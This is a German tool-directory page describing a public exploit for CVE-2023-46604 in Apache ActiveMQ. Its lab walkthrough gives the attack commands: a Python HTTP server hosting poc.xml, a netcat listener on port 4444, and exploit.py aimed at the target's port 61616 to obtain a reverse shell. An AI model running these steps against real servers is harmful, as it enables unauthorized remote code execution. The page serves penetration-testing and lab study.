Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-46604 — Exploit für CVE-2023-46604 in Apache ActiveMQ, der Remote-Codeausführung über manipulierte XML-Payloads und Reverse-Shell-Einrichtung ermöglicht. | Kitploit
Tools/GitHubGitHub/ccievoice2009/cve-2023-46604
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubccievoice2009/cve-2023-46604

CVE-2023-46604

Exploit für CVE-2023-46604 in Apache ActiveMQ, der Remote-Codeausführung über manipulierte XML-Payloads und Reverse-Shell-Einrichtung ermöglicht.

Repository anzeigen
36vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-46604

image

Erstellen Sie ein Docker-Compose mit zwei Images: dem Opferrechner und dem Zielrechner, entsprechend der erforderlichen Umgebung. Starten Sie auf dem Opferrechner ActiveMQ.

Wechseln Sie zum Angreiferrechner: • Öffnen Sie einen HTTP-Dienst, um den PoC zu senden: python3 -m http.server

• Verwenden Sie Netcat, um auf eine Verbindung zum Angreiferrechner zu lauschen: nc -nlvp 4444

• Senden Sie das Payload, um eine Reverse-Shell-Verbindung zum Angreiferrechner herzustellen: python3 exploit.py -i 172.18.0.3 -p 61616 --xml http://172.18.0.2:8000/poc.xml Dabei:

  • Exploit.py: die Datei mit dem Ausnutzungscode
  • -i 172.18.0.3: IP-Adresse des Payload-sendenden Rechners
  • -p 61616: Port, auf dem ActiveMQ des Opferrechners lauscht
  • --xml http://172.18.0.2:8000/poc.xml: URL der Datei poc.xml auf dem Angreiferrechner

Man kann sehen, dass nach der Ausführung des Befehls zum Starten der Datei 'exploit.py' der Exploit-Code ein Paket 'poc.xml' vom Webserver an das Ziel sendet, also an die Adresse des auf dem Zielserver laufenden ActiveMQ-Dienstes. Gleichzeitig erhält der HTTP-Webserver auf dem Angreiferrechner eine Anfrage von der IP-Adresse des Zielrechners.

Nach dem Senden des Payloads wechselt man zum Terminal, das auf Port 4444 des Angreiferrechners lauscht. Man sieht, dass die Reverse-Shell des Opferrechners eingegangen ist.

Tool herunterladen